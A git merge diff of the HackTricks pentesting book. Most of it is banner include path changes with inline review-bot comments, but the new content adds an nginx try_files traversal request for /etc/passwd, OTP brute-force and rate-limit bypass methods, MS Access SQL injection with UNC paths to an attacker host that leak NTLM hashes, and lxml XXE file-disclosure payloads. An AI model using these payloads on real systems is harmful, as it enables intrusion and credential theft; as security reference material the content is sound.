Merge branch 'master' into research_update_src_network-services-pentesting_pentesting-telnet_20250711_082533

SirBroccoli 2025-07-12 17:11:02 +02:00 committed by GitHub
commit 777109375e
52 changed files with 512 additions and 123 deletions

View File

@ -1,6 +1,6 @@
# 0. Basic LLM Concepts
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Pretraining
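Review bot: the replacement line hard-codes a relative depth (`../../banners/` here, `../banners/` and `../../../banners/` in later hunks of this merge), so every one of the roughly 50 swapped include lines has to match the directory depth of its own file; a wrong depth does not error out at edit time, it just silently breaks the mdBook include. A scripted pass that derives the prefix from each file's path, followed by one build of the book, would verify all of them at once.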
@ -300,4 +300,4 @@ During the backward pass:
- **Accuracy:** Provides exact derivatives up to machine precision.
- **Ease of Use:** Eliminates manual computation of derivatives.
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 1. Tokenizing
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Tokenizing
@ -99,4 +99,4 @@ print(token_ids[:50])
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 2. Data Sampling
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## **Data Sampling**
@ -241,4 +241,4 @@ tensor([[ 367, 2885, 1464, 1807],
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 3. Token Embeddings
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Token Embeddings
@ -219,4 +219,4 @@ print(input_embeddings.shape) # torch.Size([8, 4, 256])
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 4. Attention Mechanisms
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Attention Mechanisms and Self-Attention in Neural Networks
@ -430,5 +430,4 @@ For another compact and efficient implementation you could use the [`torch.nn.Mu
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 5. LLM Architecture
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## LLM Architecture
@ -702,4 +702,4 @@ print("Output length:", len(out[0]))
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 6. Pre-training & Loading models
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Text Generation
@ -971,4 +971,4 @@ There 2 quick scripts to load the GPT2 weights locally. For both you can clone t
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 7.0. LoRA Improvements in fine-tuning
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## LoRA Improvements
@ -64,4 +64,4 @@ def replace_linear_with_lora(model, rank, alpha):
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 7.1. Fine-Tuning for Classification
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## What is
@ -117,4 +117,4 @@ You can find all the code to fine-tune GPT2 to be a spam classifier in [https://
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# 7.2. Fine-Tuning to follow instructions
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
> [!TIP]
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
@ -107,4 +107,4 @@ You can find an example of the code to perform this fine tuning in [https://gith
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# LLM Training - Data Preparation
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
**These are my notes from the very recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.**
@ -99,4 +99,4 @@ You should start by reading this post for some basic concepts you should know ab
7.2.-fine-tuning-to-follow-instructions.md
{{#endref}}
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,5 @@
# Arbitrary Write 2 Exec
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -52,4 +52,4 @@ Successful exploitation results in remote arbitrary code execution at user privi
- Apple October 2024 Security Update (patch shipping CVE-2024-44236)
https://support.apple.com/en-us/121564
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -20,4 +20,4 @@ However he you can find some nice **examples**:
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

View File

@ -123,4 +123,4 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca
{{#include /banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# iOS Exploiting
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## Physical use-after-free
@ -213,4 +213,4 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) {
With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# Libc Heap
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Heap Basics
@ -531,4 +531,4 @@ heap-memory-functions/heap-functions-security-checks.md
- [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -66,4 +66,4 @@ d = malloc(20); // a
{{#include /banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -60,4 +60,4 @@ This approach avoids direct file downloads and leverages familiar UI elements to
- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
- Discord Custom Invite Link Documentation https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# Threat Modeling
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## Threat Modeling
@ -113,5 +113,4 @@ Now your finished model should look something like this. And this is how you mak
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

Binary file not shown.

Size: 190 KiB

View File

@ -166,11 +166,11 @@ Allow the process to **ask for all the TCC permissions**.
### **`kTCCServicePostEvent`**
{{#include ../../../banners/hacktricks-training.md}}
</details>
{{#include /banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}
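Review bot: the banner include appears twice in this hunk, once before `</details>` and once after it; if the first one is kept as context, the page ends with two banners. Confirm that only the trailing `{{#include ../../../banners/hacktricks-training.md}}` remains after the merge.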

View File

@ -80,4 +80,4 @@ Flutter itself **ignores device proxy settings**. Easiest options:
- [https://sensepost.com/blog/2025/intercepting-https-communication-in-flutter-going-full-hardcore-mode-with-frida/](https://sensepost.com/blog/2025/intercepting-https-communication-in-flutter-going-full-hardcore-mode-with-frida/)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -108,6 +108,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
```bash
docker pull opensecurity/mobile-security-framework-mobsf:latest
docker run -p 8000:8000 --privileged \
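Review bot: the `【†L2-L3】` marker in the MobSF sentence is a citation artefact rather than page content and should be deleted; the sentence reads fine without it. The fenced block is cut off at `docker run -p 8000:8000 --privileged \`, so check that the continuation lines and the closing fence are present in the full file.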

View File

@ -364,4 +364,4 @@ CONTAINER ID IMAGE COMMAND CRE
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

View File

@ -195,4 +195,4 @@ Entry_2:
- Khronos/Chronos draft (time-shift mitigation)
- chronyc manual/examples for remote monitoring
- zgrab2 ntp module docs
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# Angular
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## The Checklist
@ -616,5 +616,4 @@ According to the W3C documentation, the `window.location` and `document.location
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# Django
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Cache Manipulation to RCE
Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **If an attacker can gain write access to the cache, they can escalate this vulnerability to RCE on the underlying server**.
@ -76,4 +76,4 @@ Always fingerprint the exact framework version via the `X-Frame-Options` error p
* Django security release "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" 4 Jun 2025.
* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" 11 Aug 2024.
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,6 +1,6 @@
# Laravel
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
### Laravel SQLInjection
@ -91,7 +91,7 @@ The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
{{#include ../../banners/hacktricks-training.md}}
## Laravel Tricks
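Review bot: a banner include sits in the middle of the file, directly before `## Laravel Tricks`, in addition to the one at the end of the file in the next hunk. Pages in this book carry the banner only at the top and the bottom, so the mid-file copy looks like a leftover from an earlier merge of two pages and should be dropped.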
@ -283,4 +283,3 @@ The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -157,6 +157,61 @@ $ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
Scans for this misconfiguration across systems revealed multiple instances where Nginx variables could be printed by a user. However, a decrease in the number of vulnerable instances suggests that efforts to patch this issue have been somewhat successful.
### Using try_files with $URI$ARGS variables
Following Nginx misconfiguration can lead to an LFI vulnerability:
```
location / {
try_files $uri$args $uri$args/ /index.html;
}
```
In our configuration we have directive `try_files` which is used to check for existence of files in specified order. Nginx will server the first one that it will find. The basic syntax of the `try_files` directive is as follows:
```
try_files file1 file2 ... fileN fallback;
```
Nginx will check for the existence of each file in the specified order. If a file exists, it will be served immediately. If none of the specified files exist, the request will be passed to the fallback option, which can be another URI or a specific error page.
However, when using `$uri$args` variables in this directive, the Nginx will try to look for a file that matches the request URI combined with any query string arguments. Therefor we can exploit this configuration:
```
http {
server {
root /var/www/html/public;
location / {
try_files $uri$args $uri$args/ /index.html;
}
}
}
```
With following payload:
```
GET /?../../../../../../../../etc/passwd HTTP/1.1
Host: example.com
```
Using our payload we will escape the root directory (defined in Nginx configuration) and load the `/etc/passwd` file. In debug logs we can observe how the Nginx tries the files:
```
...SNIP...
2025/07/11 15:49:16 [debug] 79694#79694: *4 trying to use file: "/../../../../../../../../etc/passwd" "/var/www/html/public/../../../../../../../../etc/passwd"
2025/07/11 15:49:16 [debug] 79694#79694: *4 try file uri: "/../../../../../../../../etc/passwd"
...SNIP...
2025/07/11 15:49:16 [debug] 79694#79694: *4 http filename: "/var/www/html/public/../../../../../../../../etc/passwd"
...SNIP...
2025/07/11 15:49:16 [debug] 79694#79694: *4 HTTP/1.1 200 OK
```
PoC againts Nginx using the configuration mentioned above:
![Example burp request](../../images/nginx_try_files.png)
## Raw backend response reading
Nginx offers a feature through `proxy_pass` that allows for the interception of errors and HTTP headers produced by the backend, aiming to hide internal error messages and headers. This is accomplished by Nginx serving custom error pages in response to backend errors. However, challenges arise when Nginx encounters an invalid HTTP request. Such a request gets forwarded to the backend as received, and the backend's raw response is then directly sent to the client without Nginx's intervention.
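Review bot: the new try_files section explains the misconfiguration but never states the fix; since `$args` is never needed to locate a file on disk, the safe form is `try_files $uri $uri/ /index.html;`, and that line belongs right after the debug-log excerpt, which already shows why the original is dangerous (nginx joins `root` and the un-normalised query string without collapsing the `..` segments, hence the 200 OK). Three typos in the prose: "Nginx will server the first one" should be "serve", "Therefor" should be "Therefore", and "PoC againts Nginx" should be "against". The three bare fences would also render better tagged as `nginx` and `http` like the rest of the page.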

View File

@ -1,6 +1,6 @@
# NodeJS Express
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Cookie Signature
@ -39,5 +39,4 @@ cookie-monster -e -f new_cookie.json -k secret
```
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -63,9 +63,9 @@ Host: target.com
Connection: close
```
{{#include ../../banners/hacktricks-training.md}}
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
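Review bot: after this change the file appears to end with two identical `{{#include ../../banners/hacktricks-training.md}}` lines, one above the removed absolute include and one below it; keep a single trailing banner.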

View File

@ -1,6 +1,6 @@
# DApps - Decentralized Applications
{{#include ../../banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## What is a DApp?
@ -79,6 +79,5 @@ In the scenario **`Mishandling of Asset Classes`**, is explained that the backen
- [https://www.certik.com/resources/blog/web2-meets-web3-hacking-decentralized-applications](https://www.certik.com/resources/blog/web2-meets-web3-hacking-decentralized-applications)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

View File

@ -47,13 +47,13 @@ if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\
- [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
```
```
{{#include ../../banners/hacktricks-training.md}}
```
```
{{#include /banners/hacktricks-training.md}}
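Review bot: this hunk goes the opposite way from the rest of the merge (its last line is the absolute `/banners/` form), and the include is wrapped in two pairs of empty ``` fences, which will render the banner as an empty code block. The context line `if **name** == "**main**"` has also lost its underscores (`__name__ == "__main__"`) to markdown rendering, so the source file looks like it was saved from a rendered view and should be checked as a whole.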

View File

@ -80,10 +80,10 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
* **OWASP ZAP**: Auth Matrix, Forced Browse.
* **Github projects**: `bwapp-idor-scanner`, `Blindy` (bulk IDOR hunting).
{{#include ../banners/hacktricks-training.md}}
## References
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
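Review bot: a banner include sits directly before `## References` as well as at the end of the file; drop the mid-file one so the page ends with a single banner like the other pages in this merge.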

View File

@ -54,11 +54,74 @@ If the target system applies rate limits on a per-account or per-session basis,
Note that even if a rate limit is in place you should try to see if the response is different when the valid OTP is sent. In [**this post**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732), the bug hunter discovered that even if a rate limit is triggered after 20 unsuccessful attempts by responding with 401, if the valid one was sent a 200 response was received.
### Tools
---
- [**https://github.com/Hashtag-AMIN/hashtag-fuzz**](https://github.com/Hashtag-AMIN/hashtag-fuzz): hashtag-fuzz is a fuzzing tool designed to test and bypass WAFs and CDNs. By leveraging advanced features such as random User-Agent and header value, random delays, handle multi-threading, selective chunking of wordlists and Round Robin proxy rotation for each chunked, it offers a robust solution for security professionals aiming to identify vulnerabilities in web applications.
### Abusing HTTP/2 multiplexing & request pipelining (2023-2025)
Modern ratelimiter implementations frequently count **TCP connections** (or even individual HTTP/1.1 requests) instead of the *number of HTTP/2 streams* a connection contains. When the same TLS connection is reused, an attacker can open hundreds of parallel streams, each carrying a separate request, while the gateway only deducts *one* request from the quota.
```bash
# Send 100 POST requests in a single HTTP/2 connection with curl
seq 1 100 | xargs -I@ -P0 curl -k --http2-prior-knowledge -X POST \
-H "Content-Type: application/json" \
-d '{"code":"@"}' https://target/api/v2/verify &>/dev/null
```
If the limiter protects only `/verify` but not `/api/v2/verify`, you can also combine **path confusion** with HTTP/2 multiplexing for *extremely* high-speed OTP or credential brute-forcing.
> 🐾 **Tip:** PortSwiggers [Turbo Intruder](https://portswigger.net/research/turbo-intruder) supports HTTP/2 and lets you fine-tune `maxConcurrentConnections` and `requestsPerConnection` to automate this attack.
### GraphQL aliases & batched operations
GraphQL allows the client to send **several logically independent queries or mutations in a single request** by prefixing them with *aliases*. Because the server executes every alias but the rate-limiter often counts only *one* request, this is a reliable bypass for login or password-reset throttling.
```graphql
mutation bruteForceOTP {
a: verify(code:"111111") { token }
b: verify(code:"222222") { token }
c: verify(code:"333333") { token }
# … add up to dozens of aliases …
}
```
Look at the response: exactly one alias will return 200 OK when the correct code is hit, while the others are rate-limited.
The technique was popularised by PortSwiggers research on “GraphQL batching & aliases” in 2023 and has been responsible for many recent bug-bounty payouts.
### Abuse of *batch* or *bulk* REST endpoints
Some APIs expose helper endpoints such as `/v2/batch` or accept an **array of objects** in the request body. If the limiter is placed in front of the *legacy* endpoints only, wrapping multiple operations inside a single bulk request may completely sidestep the protection.
```json
[
{"path": "/login", "method": "POST", "body": {"user":"bob","pass":"123"}},
{"path": "/login", "method": "POST", "body": {"user":"bob","pass":"456"}}
]
```
### Timing the sliding-window
A classic token-bucket or leaky-bucket limiter *resets* on a fixed time boundary (for example, every minute). If the window is known (e.g. via error messages such as `X-RateLimit-Reset: 27`), fire the maximum allowed number of requests **just before** the bucket resets, then immediately fire another full burst.
```
|<-- 60 s window ->|<-- 60 s window ->|
###### ######
```
This simple optimisation can more than double your throughput without touching any other bypass technique.
---
## Tools
- [**https://github.com/Hashtag-AMIN/hashtag-fuzz**](https://github.com/Hashtag-AMIN/hashtag-fuzz): Fuzzing tool that supports header randomisation, chunked word-lists and round-robin proxy rotation.
- [**https://github.com/ustayready/fireprox**](https://github.com/ustayready/fireprox): Automatically creates disposable AWS API Gateway endpoints so every request originates from a different IP address perfect for defeating IP-based throttling.
- **Burp Suite IPRotate + extension**: Uses a pool of SOCKS/HTTP proxies (or AWS API Gateway) to rotate the source IP transparently during *Intruder* and *Turbo Intruder* attacks.
- **Turbo Intruder (BApp)**: High-performance attack engine supporting HTTP/2 multiplexing; tune `requestsPerConnection` to 100-1000 to collapse hundreds of requests into a single connection.
## References
- PortSwigger Research “Bypassing rate limits with GraphQL aliasing” (2023) <https://portswigger.net/research/graphql-authorization-bypass>
- PortSwigger Research “HTTP/2: The Sequel is Always Worse” (section *Connection-based throttling*) (2024) <https://portswigger.net/research/http2>
{{#include ../banners/hacktricks-training.md}}
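Review bot: the curl example does not do what its comment says: `xargs -P0` launches 100 independent curl processes, each with its own TCP and TLS connection, so it never exercises the per-connection counting the paragraph describes; either reword the comment or defer to the Turbo Intruder tip directly below, which is the tool that actually multiplexes streams on one connection. The "Timing the sliding-window" heading also contradicts its body: a limiter that resets on a fixed boundary and can be hit with two back-to-back bursts is a fixed-window counter, and token bucket, leaky bucket and sliding-window designs exist precisely to blunt that edge, so rename the heading and the first sentence. hashtag-fuzz is now listed twice (old `### Tools` block under `---` and the new `## Tools` list); remove the old block. Minor: "PortSwiggers" needs an apostrophe in both places, and a separator is missing in "different IP address perfect for defeating".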

View File

@ -4,7 +4,7 @@
## Online Playground
- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format\&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
## DB Limitations
@ -127,9 +127,21 @@ IIF((select mid(last(username),1,1) from (select top 10 username from users))='a
In a nutshell, the query uses an “if-then” statement in order to trigger a “200 OK” in case of success or a “500 Internal Error” otherwise. Taking advantage of the TOP 10 operator, it is possible to select the first ten results. The subsequent usage of LAST allows to consider the 10th tuple only. On such value, using the MID operator, it is possible to perform a simple character comparison. Properly changing the index of MID and TOP, we can dump the content of the “username” field for all rows.
### Time Based
### Time-Based (Blind) Tricks
Check [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN](<https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN>)
Jet/ACE SQL itself does **not** expose a native `SLEEP()` or `WAITFOR` function, so traditional time-based blind injections are limited. However, you can still introduce a measurable delay by forcing the engine to access a **network resource that is slow or does not answer**. Because the engine will try to open the file before returning the result, the HTTP response time reflects the round-trip latency to the attacker-controlled host.
```sql
' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'--
```
Point the UNC path to:
* a SMB share behind a high-latency link
* a host that drops the TCP handshake after `SYN-ACK`
* a firewall sinkhole
The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984.
### Other Interesting functions
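Review bot: this time-based section and the later "Remote Database Access & NTLM Credential Theft" section in the same file both rest on the same `IN '\\host\share\...'` clause and both cite KB5002984, but only the later one lists the `AllowQueryRemoteTables` mitigation; add a one-line cross-reference here so a reader who stops at the timing trick still sees that the same registry setting closes both vectors.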
@ -162,7 +174,7 @@ However, note that is very typical to find SQL Injections where you **don't have
The knowledge of the **web root absolute path may facilitate further attacks**. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database.
`http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
`http://localhost/script.asp?id=1'+ '+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
MS Access responds with an **error message containing the web directory full pathname**.
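Review bot: the only change in this hunk inserts a literal space into the URL (`id=1'+ '+UNION`), which breaks the payload when copied; if the intent was to avoid markdown escaping, the line is already in backticks, so keep it as `id=1'+'+UNION`.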
@ -182,7 +194,42 @@ Another way to enumerate files consists into **specifying a database.table item*
`http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00`
Where **name\[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
Where **name[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
### Remote Database Access & NTLM Credential Theft (2023)
Since Jet 4.0 every query can reference a table located in a *different* `.mdb/.accdb` file via the `IN '<path>'` clause:
```sql
SELECT first_name FROM Employees IN '\\server\share\hr.accdb';
```
If user input is concatenated into the part after **IN** (or into a `JOIN … IN` / `OPENROWSET` / `OPENDATASOURCE` call) an attacker can specify a **UNC path** that points to a host they control. The engine will:
1. try to authenticate over SMB / HTTP to open the remote database;
2. leak the web-servers **NTLM credentials** (forced authentication);
3. parse the remote file a malformed or malicious database can trigger Jet/ACE memory-corruption bugs that have been patched multiple times (e.g. CVE-2021-28455).
Practical injection example:
```sql
1' UNION SELECT TOP 1 name
FROM MSysObjects
IN '\\attacker\share\poc.mdb'-- -
```
Impact:
* Out-of-band exfiltration of Net-NTLMv2 hashes (usable for relay or offline cracking).
* Potential remote code execution if a new Jet/ACE parser bug is exploited.
Mitigations (recommended even for legacy Classic ASP apps):
* Add the registry value `AllowQueryRemoteTables = 0` under `HKLM\Software\Microsoft\Jet\4.0\Engines` (and under the equivalent ACE path). This forces Jet/ACE to reject remote paths starting with `\\`.
* Block outbound SMB/WebDAV at the network boundary.
* Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent.
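Review bot: step 3 of the numbered list lost its punctuation ("parse the remote file a malformed or malicious database can trigger ...") and needs a colon or semicolon after "file". In the mitigations, "under the equivalent ACE path" should name the actual key documented in KB5002984 rather than leave the reader to guess, because a value set under the wrong hive does nothing and gives a false sense of protection.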
### .mdb Password Cracker
@ -191,8 +238,7 @@ Where **name\[i] is a .mdb filename** and **realTable is an existent table** wit
## References
- [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
- [Microsoft KB5002984 Configuring Jet/ACE to block remote tables](https://support.microsoft.com/en-gb/topic/kb5002984-configuring-jet-red-database-engine-and-access-connectivity-engine-to-block-access-to-remote-databases-56406821-30f3-475c-a492-208b9bd30544)
- [Check Point Research Abusing Microsoft Access Linked Tables for NTLM Forced Authentication (2023)](https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/)
{{#include ../../banners/hacktricks-training.md}}
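Review bot: the two new reference titles lost the separator between source and title ("Microsoft KB5002984 Configuring ...", "Check Point Research Abusing ..."); restore a colon or dash so they match the existing entry style.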

View File

@ -1,6 +1,6 @@
# XSS (Cross Site Scripting)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Methodology

View File

@ -773,6 +773,65 @@ Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe-
https://github.com/luisfontes19/xxexploiter
{{#endref}}
### Python lxml Parameter-Entity XXE (Error-Based File Disclosure)
> [!INFO]
> The Python library **lxml** uses **libxml2** under the hood. Versions prior to **lxml 5.4.0 / libxml2 2.13.8** still expand *parameter* entities even when `resolve_entities=False`, making them reachable when the application enables `load_dtd=True` and/or `resolve_entities=True`. This allows Error-Based XXE payloads that embed the contents of local files into the parser error message.
#### 1. Exploiting lxml < 5.4.0
1. Identify or create a *local* DTD on disk that defines an **undefined** parameter entity (e.g. `%config_hex;`).
2. Craft an internal DTD that:
* Loads the local DTD with `<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">`.
* Redefines the undefined entity so that it:
- Reads the target file (`<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">`).
- Builds another parameter entity that refers to an **invalid path** containing the `%flag;` value and triggers a parser error (`<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">`).
3. Finally expand `%local_dtd;` and `%eval;` so that the parser encounters `%error;`, fails to open `/aaa/<FLAG>` and leaks the flag inside the thrown exception which is often returned to the user by the application.
```xml
<!DOCTYPE colors [
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
<!ENTITY % config_hex '
<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">
%eval;'>
%local_dtd;
]>
```
When the application prints the exception the response contains:
```
Error : failed to load external entity "file:///aaa/FLAG{secret}"
```
> [!TIP]
> If the parser complains about `%`/`&` characters inside the internal subset, double-encode them (`&#x26;#x25;``%`) to delay expansion.
#### 2. Bypassing the lxml 5.4.0 hardening (libxml2 still vulnerable)
`lxml` ≥ 5.4.0 forbids *error* parameter entities like the one above, but **libxml2** still allows them to be embedded in a *general* entity. The trick is to:
1. Read the file into a parameter entity `%file`.
2. Declare another parameter entity that builds a **general** entity `c` whose SYSTEM identifier uses a *non-existent protocol* such as `meow://%file;`.
3. Place `&c;` in the XML body. When the parser tries to dereference `meow://…` it fails and reflects the full URI including the file contents in the error message.
```xml
